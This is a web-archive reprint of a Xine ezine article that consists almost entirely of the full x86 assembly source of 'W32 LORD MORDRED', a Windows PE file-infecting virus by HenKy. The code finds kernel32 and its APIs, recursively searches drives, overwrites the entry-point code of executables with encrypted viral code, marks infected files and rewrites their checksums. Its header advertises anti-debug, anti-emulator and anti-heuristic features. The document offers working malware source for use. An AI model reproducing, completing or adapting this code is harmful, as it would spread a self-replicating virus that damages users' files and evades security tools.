Copy Link
Add to Bookmark
Report

Xine - issue #5 - Phile 209

eZine's profile picture
Published in 
Xine
 · 6 months ago

 

Ú-----------------------------¿
| Xine - issue #5 - Phile 209 |
À-----------------------------Ù







;--------------------- W32 LORD MORDRED BY HenKy ---------------------------;
; ;
;-AUTHOR: HenKy ;
; ;
;-MAIL: HenKy_@latinmail.com ;
; ;
;-ORIGIN: SPAIN ;
; ;
;-TARGET'S: PE EXE, ;
;-OS'S: W32 ;
;-PARASITIC YES ;
;-MULTIPARTITE NO ;
;-RESIDENT: YES ;
;-STEALTH: NO ;
;-THREADS: YES ;
;-KERNEL SEARCH: YES ;
;-API SEARCH: YES ;
;-ENCRYPTED: YES ;
;-POLYMORPHIC: YES (UNFINISHED) ;
;-METAMORPHIC: NO ;
;-ANTIDEBUGGER: YES ;
;-ANTITRACE: YES ;
;-ANTIEMULATOR: YES ;
;-ANTIDISASM: YES ;
;-ANTIHEURISTIC: YES ;
;-ANTIBAIT: YES ;
;-ERROR HANLING: YES ;
;-RETRO: YES ;
;-COMPRESSION: YES :
;-EPO: YES ;
;-ANTIWATCHDOGS: YES ;
;-CHECKSUM: YES ;
;-100% OWN CODE: YES ;
;-OPTIMIZATIONS: YES ;
;----------------------------------------------------------------------------;

; WELCOME TO THE LORD MORDRED... *^_^*



; MAY BE MY LAST VIRUS....
; IM TOO BORED TO FINISH IT ...

; MAYBE MAKE IT METAMORPHIC... ???

; ???

.586P
;PMMX
.MODEL FLAT
LOCALS


EXTRN ExitProcess:PROC

MIX_SIZ EQU FILE_END-MEGAMIX
MIX_MEM EQU MEM_END-MEGAMIX
MARKA EQU 66
FLAGZ EQU 00000020H OR 20000000H OR 80000000H


MACROSIZE MACRO

DB MIX_SIZ/01000 MOD 10 + "0"
DB MIX_SIZ/00100 MOD 10 + "0"
DB MIX_SIZ/00010 MOD 10 + "0"
DB MIX_SIZ/00001 MOD 10 + "0"

ENDM

MACROMEM MACRO

DB MIX_MEM/01000 MOD 10 + "0"
DB MIX_MEM/00100 MOD 10 + "0"
DB MIX_MEM/00010 MOD 10 + "0"
DB MIX_MEM/00001 MOD 10 + "0"

ENDM

MACROHEAP MACRO

DB (MIX_MEM-MIX_SIZ)/01000 MOD 10 + "0"
DB (MIX_MEM-MIX_SIZ)/00100 MOD 10 + "0"
DB (MIX_MEM-MIX_SIZ)/00010 MOD 10 + "0"
DB (MIX_MEM-MIX_SIZ)/00001 MOD 10 + "0"

ENDM

.DATA
DB 'PHYSICAL SIZE = '

MACROSIZE

DB ' BYTES',0

DB 'VIRTUAL SIZE = '

MACROMEM

DB ' BYTES',0

DB 'CODE IN HEAP = '

MACROHEAP

DB ' BYTES',0

.CODE

FAKE:
CALL DELTA2

DELTA2: POP ESI
LEA ESI,[ESI+MEGAMIX-DELTA2]
SUB ESP,MIX_MEM
MOV EDI,ESP
PUSH MIX_MEM
POP ECX
REP MOVSB
LEA ECX,[ESP+TRICK]
MOV EAX,[ESP+MIX_MEM]
JMP ECX
ALIGN 4

MEGAMIX:
MOV EAX,[ESP+MIX_MEM-4]
TRICK EQU $-MEGAMIX
START:
CALL DELTA
DELTA: POP EBP

CALL CYPHERER

CRYPTOTRON:

XOR AX,AX
SZ:
CMP BYTE PTR [EAX],'M'
JZ F_GPA
SUB EAX,1000H
JMP SZ

F_GPA:
LEA ESI,[EBP+GPA_95-DELTA]
MOV EDI,EAX
PUSH EAX
BSWAP EAX

CMP AL,0BFH
JZ SCANIT
CMP AH,0F0H
JZ WNT
W2000:
ADD ESI,8

WNT:
ADD ESI,8

SCANIT:
MOV EDX,800000

SCANKRNL:

PUSH 8
POP ECX
PUSH ESI
PUSH EDI
REPZ CMPSB
POP EDI
POP ESI
JZ FOUND
INC EDI
DEC EDX
JZ WARNING
JMP SCANKRNL

FOUND:
INC EDI
INC EDI
INC EDI
MOV [EBP+GPA-DELTA], EDI
POP EBX


API_DECOMPRESSOR:

PUSHAD
LEA ESI, [EBP+APIs-DELTA]
LEA EDI, [EBP+APIBUFF-DELTA]
DEPACK:
PUSH 6
POP ECX
XOR EBX,EBX
LODSB
TEST AL,AL
JZ ZOPSB
CMP AL,'X'
JZ END_UN
CMP AL,9
JB LOADZ
ZOPSB: STOSB
JMP DEPACK

LOADZ:
PUSH ESI
LEA ESI,[EBP+API_TBL-DELTA]
CMP AL,1
JZ PUT_1
CMP AL,2
JZ PUT_2
CMP AL,3
JZ PUT_3
CMP AL,4
JZ PUT_4
CMP AL,5
JZ PUT_5
CMP AL,6
JZ PUT_6
CMP AL,7
JZ PUT_7

PUT_8:
PUSH 11
POP ECX
PUSH 32
POP EBX
JMP BOCOI

PUT_7: PUSH 26
POP EBX
JMP BOCOI

PUT_6: PUSH 3
POP ECX
PUSH 23
POP EBX
JMP BOCOI

PUT_5: PUSH 3
POP ECX
PUSH 20
POP EBX
JMP BOCOI

PUT_4: PUSH 14
POP EBX
JMP BOCOI

PUT_3: PUSH 4
POP ECX
PUSH 10
POP EBX
JMP BOCOI

PUT_2: PUSH ECX
POP EBX
PUSH 4
POP ECX
JMP BOCOI

PUT_1:

BOCOI:
ADD ESI,EBX
REP MOVSB
POP ESI
JMP DEPACK

END_UN: STOSB
POPAD

LEA ESI, [EBP+APIBUFF-DELTA]
LEA EDI, [EBP+APIaddresses-DELTA]

GPI: PUSH ESI
PUSH EBX
CALL [EBP+GPA-DELTA]
CLD
STOSD

NPI:
LODSB
TEST AL, AL
JNZ SHORT NPI
CMP [ESI], AL
JNZ GPI

THREAD_C:

;PUSH -2
;PUSH -2
;CALL DWORD PTR [EBP+SetThreadPriority-DELTA]

;CDQ
;LEA EAX,[EBP+THR-DELTA]
;PUSH EAX
;PUSH EDX
;PUSH EDX
;LEA EAX,[EBP+WARNING-DELTA]
;PUSH EAX
;PUSH EDX
;PUSH EDX
;CALL DWORD PTR [EBP+CreateThread-DELTA]

;CALL DELAY

BUCLE:
CALL INFECT
PUSH 8
POP ECX
SLOOP:
PUSH ECX
LEA EDX, [EBP+DRIV-DELTA]
INC BYTE PTR [EDX]
CALL SCANNER
POP ECX
LOOP SLOOP
MOV BYTE PTR [EBP+DRIV-DELTA],'B'
;JMP BUCLE


WARNING:

MOV EDI,12345678H
ZONE EQU $-4
ADD ESP,(MIX_MEM-4)
PUSH EDI
MOV ESI,12345678H
BASS EQU $-4
PUSH POLY_SIZ/4
POP ECX
REP MOVSD

MOV AL,BYTE PTR [EBP+LLAVE-DELTA]
PUSH POLY_SIZ
POP ECX
POP EDI
PUSH EDI
POK@:
XOR BYTE PTR [EDI],AL
INC EDI
LOOP POK@

RET

DRIV DB 'B:\',0

INFECT:

;CALL DELAY
LEA EAX, [EBP+OFFSET Win32FindData-DELTA]
PUSH EAX
LEA EAX, [EBP+OFFSET IMASK-DELTA]
PUSH EAX
CALL DWORD PTR [EBP+FindFirstFile-DELTA]
MOV DWORD PTR [EBP+SearcHandle-DELTA],EAX


LOOPER:
INC EAX
JZ RETOX
DEC EAX
TEST EAX,EAX
JNZ ALLKEY
RETOX:
RET

ALLKEY:


PUSH DWORD PTR [EBP+BASS-DELTA]
PUSH DWORD PTR [EBP+ZONE-DELTA]
PUSH DWORD PTR [EBP+LLAVE-DELTA]
LEA EBX ,[EBP+offset FNAME-DELTA] ; OPEN IT!

MOV EAX, DWORD PTR [EBP+WFD_dwFileAttributes-DELTA]
AND AL, NOT 00000001b

PUSH EAX
PUSH EBX
CALL DWORD PTR [EBP+SetFileAttributesA-DELTA]

CDQ
PUSH EDX
PUSH 80h
PUSH 3
PUSH EDX
PUSH EDX
PUSH 0C0000000h
PUSH EBX
CALL DWORD PTR [EBP+CreateFile-DELTA]

INC EAX
JZ Cerrar
DEC EAX
MOV DWORD PTR [EBP+FileHandle-DELTA],EAX ; SAVE HNDL
MOV ECX, DWORD PTR [EBP+WFD_nFileSizeLow-DELTA]
CDQ
PUSH EDX
PUSH ECX
PUSH EDX
PUSH 4H
PUSH EDX
PUSH DWORD PTR [EBP+FileHandle-DELTA]
CALL DWORD PTR [EBP+CreateFileMappingA-DELTA]
TEST EAX,EAX
JNZ CONTNUE

Cerrar:

POP DWORD PTR [EBP+LLAVE-DELTA]
POP DWORD PTR [EBP+ZONE-DELTA]
POP DWORD PTR [EBP+BASS-DELTA]

PUSH DWORD PTR [EBP+FileHandle-DELTA]
CALL DWORD PTR [EBP+CloseHandle-DELTA]

LEA EAX, [EBP+offset Win32FindData-DELTA]
PUSH EAX
PUSH DWORD PTR [EBP+SearcHandle-DELTA]
CALL DWORD PTR [EBP+FindNextFile-DELTA]
JMP LOOPER

CONTNUE:

MOV DWORD PTR [EBP+MapHandle-DELTA],EAX
MOV ECX, DWORD PTR [EBP+WFD_nFileSizeLow-DELTA]
CDQ
PUSH ECX
PUSH EDX
PUSH EDX
INC EDX
INC EDX
PUSH EDX
PUSH DWORD PTR [EBP+MapHandle-DELTA]
CALL DWORD PTR [EBP+MapViewOfFile-DELTA]
TEST EAX,EAX
JZ Cerrar

MOV DWORD PTR [EBP+MapAddress-DELTA],EAX
MOV ESI,EAX ; GET PE HDR
MOV ESI,[EAX+3CH]
ADD ESI,EAX
CMP BYTE PTR [ESI],"P" ; IS A 'P'E ?
JNZ Cerrar
MOV EDI,ESI

MOV EBX,[ESI+74H]
SHL EBX,3 ; MAKE FIRST SECTION WRITEABLE
ADD ESI,78H
ADD ESI,EBX
OR DWORD PTR [ESI+24H],FLAGZ
MOV EDX,[ESI+12]
SUB EDX,[ESI+20]
MOV DWORD PTR [EBP+SUBBER-DELTA],EDX
MOV EAX,[ESI+8]
ADD EAX,[ESI+12]
MOV DWORD PTR [EBP+SIZO-DELTA],EAX

MOV EBX,[EDI+28H]
MOV EAX,12345678H
SIZO EQU $-4
CMP EAX,EBX
JB Cerrar

CMP BYTE PTR [EDI+MARKA],"H" ; HenKy IS HERE ?
JZ Cerrar

XOR ECX,ECX
MOV CL,BYTE PTR [EDI+6]
PUSH ESI

SERCH:
CMP DWORD PTR [ESI],"ler."
JZ NIZE
ADD ESI,40
LOOP SERCH
POP ESI
JMP Cerrar

NIZE:
POP ECX
MOV ECX,[EDI+3CH]
MOV EBX,[EDI+56]
CMP ECX,EBX
JNZ NIXX
CDQ
MOV [EBP+SUBBER-DELTA],EDX

NIXX:

MOV DWORD PTR [ESI],"adr."
MOV WORD PTR [ESI+4],"at"
CMP DWORD PTR [ESI+8],MIX_SIZ
JB Cerrar

MOV EAX,[ESI+20]
MOV DWORD PTR [EBP+NEW_EIP-DELTA],EAX

MOV EAX,[ESI+12] ; RVA
ADD EAX,[EDI+34H] ; IMAGE BASE
MOV [EBP+BASS-DELTA],EAX

OKA:
PUSHAD ; SAVE OLD DATA
MOV ESI,[EDI+28H]
ADD ESI,[EDI+34H]
MOV [EBP+ZONE-DELTA],ESI
SUB ESI,[EDI+34H]
SUB ESI,12345678h
SUBBER EQU $-4
ADD ESI,DWORD PTR [EBP+MapAddress-DELTA]

PUSHAD
RD:
DB 0FH,31H
CMP AL,0
JE RD
MOV BYTE PTR [EBP+LLAVE-DELTA],AL
PUSH POLY_SIZ
POP ECX
PO@:
XOR BYTE PTR [ESI],AL
INC ESI
LOOP PO@

POPAD

MOV EDI,12345678H
NEW_EIP EQU $-4
ADD EDI,DWORD PTR [EBP+MapAddress-DELTA]
PUSH POLY_SIZ/4
POP ECX
REP MOVSD
POPAD

CALL ENGINE
PUSHAD
MOV BYTE PTR [EDI+MARKA],"H" ; HenKy RULEEZZ
MOV EDI,[EDI+28H]
ADD EDI,DWORD PTR [EBP+MapAddress-DELTA]
SUB EDI,DWORD PTR [EBP+SUBBER-DELTA]
LEA ESI,[EBP+POLYBUFF-DELTA] ; COPY NEW DATA
PUSH POLY_SIZ/4
POP ECX
REP MOVSD
POPAD

CDQ
CMP DWORD PTR [EDI+58H], EDX
JZ UnMapFile
MOV DWORD PTR [EDI+58H], EDX
MOV ESI, [EBP+MapAddress-DELTA]
MOV ECX, DWORD PTR [EBP+WFD_nFileSizeLow-DELTA]
SHR ECX, 1

CHK_LOOP:

MOVZX EAX, WORD PTR [ESI]
ADD EDX, EAX
MOV EAX, EDX
AND EDX, 0FFFFh
SHR EAX, 16
ADD EDX, EAX
INC ESI
INC ESI
LOOP CHK_LOOP
MOV EAX, EDX
SHR EAX, 16
ADD AX, DX
ADD EAX, DWORD PTR [EBP+WFD_nFileSizeLow-DELTA]
MOV DWORD PTR [EDI+58H], EAX

UnMapFile:

PUSH DWORD PTR [EBP+MapAddress-DELTA]
CALL DWORD PTR [EBP+UnmapViewOfFile-DELTA]

CloseMap:

PUSH DWORD PTR [EBP+MapHandle-DELTA]
CALL DWORD PTR [EBP+CloseHandle-DELTA]
JMP Cerrar


DELAY:
;PUSH 10000
;CALL DWORD PTR [EBP+Sleep-DELTA]
;RET

SET_DIR:

PUSH EDX
CALL [EBP+SetCurrentDirectory-DELTA]
;CALL DELAY
RET

SCANNER:

CALL SET_DIR

RECURSIVE:

CALL INFECT
LEA EAX, [EBP+Win32FindData-DELTA]
PUSH EAX
LEA EAX, [EBP+DIR2-DELTA]
PUSH EAX
CALL [EBP+FindFirstFile-DELTA]
MOV EDI, EAX
INC EAX
JZ NOMORE

PROCESS:

LEA EAX, [EBP+WFD_dwFileAttributes-DELTA]
MOV AL, [EAX]
CMP AL, 10H
JNE NEXT
LEA EDX, [EBP+FNAME-DELTA]
CMP BYTE PTR [EDX], '.'
JE NEXT
CALL SET_DIR
PUSH EDI
LEA EDX, [EBP+FNAME-DELTA]
CALL RECURSIVE
POP EDI
LEA EDX, [EBP+PDIR-DELTA]
CALL SET_DIR

NEXT:

LEA EAX, [EBP+Win32FindData-DELTA]
PUSH EAX
PUSH EDI
CALL [EBP+FindNextFile-DELTA]
OR EAX, EAX
JNZ PROCESS

NOMORE:

RET



CRYPT_SIZ EQU $-CRYPTOTRON

;---------------------------------------------------------------------------;
; POLYMORPHIC ENGINE STARTS HERE ;
;---------------------------------------------------------------------------;

ENGINE:

PUSHAD
DB 0FH,31H
MOV BYTE PTR [EBP+KEY-DELTA],AL
CALL CYPHERER
LEA ESI,[EBP+FILE_END-DELTA]
LEA EDI,[EBP+POLYBUFF-DELTA]

PUSH ESI
LEA ESI,[EBP+FIX-DELTA]
MOV ECX,FIX_SIZ
REP MOVSB
POP ESI

MOV ECX,((MIX_SIZ/4)-1)
LLOP:
SUB ESI,8
MOV AL,'h'
STOSB
MOVSD
JMP GARBAHE
@L:
LOOP LLOP

MOV AX,0E4FFH
STOSW
CALL CYPHERER
POPAD
RET

GARBAHE:

PUSH ESI
LEA ESI,[EBP+ONE_BYTERS-DELTA]
BAHE:
DB 0FH,31H
ADD AL,AH
CMP AL,10
JAE BAHE
XOR AH,AH
BSWAP EAX
XOR AX,AX
BSWAP EAX
ADD ESI,EAX
LODSD
STOSD
POP ESI
JMP @L


CYPHERER:

PUSH EBP
MOV ECX,CRYPT_SIZ
ADD EBP,(CRYPTOTRON-DELTA)
CALL CRP

ADD EBP,NO_ME_RAYES
MOV ECX,(FILE_END-APIs)
CALL CRP
POP EBP
RET

CRP:
XOR BYTE PTR [EBP],0
KEY EQU $-1
INC EBP
LOOP CRP
RET

ONE_BYTERS:

DB 040H,041H,042H,043H,045H,046H,047H
DB 048H,049H,04AH,04BH,04DH,04EH,04FH
DB 090H,091H,092H,093H,094H,095H,096H
DB 027H,02FH,03FH,0D4H,0D5H,0ECH,09FH
DB 098H,099H,09EH,0F8H,0F9H,0FCH,0FDH
DB 0F5H,097H,90H,90H,90H

FIX:
SUB ESP,(MIX_MEM-MIX_SIZ)
FIX_SIZ EQU $-FIX

NO_ME_RAYES EQU $-ENGINE

;Create = 01H
;File = 02H
;Find = 03H
;ViewOf = 04H
;Map = 05H
;Set = 06H
;Thread = 07H
;AttributesA = 08H

APIs:
DB 01H,02H,"A",0
DB "CloseHandle",0
DB 03H,"First",02H,"A",0
DB 03H,"Next",02H,"A",0
DB "Read",02H,0
DB 05H,04H,02H,0
DB "Unmap",04H,02H,0
DB 01H,02H,05H,"pingA",0
DB 06H,"CurrentDirectoryA",0
DB 01H,07H,0
DB 06H,07H,"Priority",0
DB "Sleep",0
DB 06H,02H,08H,0
Zero_ DB 0
DB "X"

APIX_SIZ EQU $-APIs

API_TBL:

DB "Create" ; 6
DB "File" ; 4
DB "Find" ; 4
DB "ViewOf" ; 6
DB "Map" ; 3
DB "Set" ; 3
DB "Thread" ; 6
DB "AttributesA" ;11


GPA_95 DB 0C2H,04H,00H,57H,6AH,22H,2Bh,0D2H

GPA_NT DB 0C2H,04H,00H,55H,8Bh,4CH,24H,0CH

GPA_2KB DB 48H,03H,00H,55H,8Bh,0ECh,51H,51H

;GPA_2K DB 00FH,00H,00H,55H,8Bh,0ECh,51H,51H

IMASK DB "*.ZZZ",0
DIR2 DB "*.",0
PDIR DB "..",0
LLAVE DB 0

DB 'LORD MORDRED by HenKy'
DB 4 DUP (0)

ALIGN 4


FILE_END LABEL BYTE



APIaddresses:

CreateFile DD 0
CloseHandle DD 0
FindFirstFile DD 0
FindNextFile DD 0
ReadFile DD 0
MapViewOfFile DD 0
UnmapViewOfFile DD 0
CreateFileMappingA DD 0
SetCurrentDirectory DD 0
CreateThread DD 0
SetThreadPriority DD 0
Sleep DD 0
SetFileAttributesA DD 0

THR DD 0
GPA DD 0
SearcHandle DD 0
FileHandle DD 0
MapHandle DD 0
MapAddress DD 0

APIBUFF DB APIX_SIZ DUP (0)
POLYBUFF DB (2*(FILE_END-MEGAMIX) + ((FILE_END-MEGAMIX)/4)) DUP (0)

POLY_SIZ EQU $-APIBUFF

FILETIME STRUC

FT_dwLowDateTime DD ?
FT_dwHighDateTime DD ?

FILETIME ENDS

Win32FindData:

WFD_dwFileAttributes DD 0
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh DD 0
WFD_nFileSizeLow DD 0
WFD_dwReserved0 DD 0
WFD_dwReserved1 DD 0
FNAME DB 260H DUP (0)


MEM_END LABEL BYTE

EXITPROC:

PUSH 0
CALL ExitProcess

ENDS
END FAKE



← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT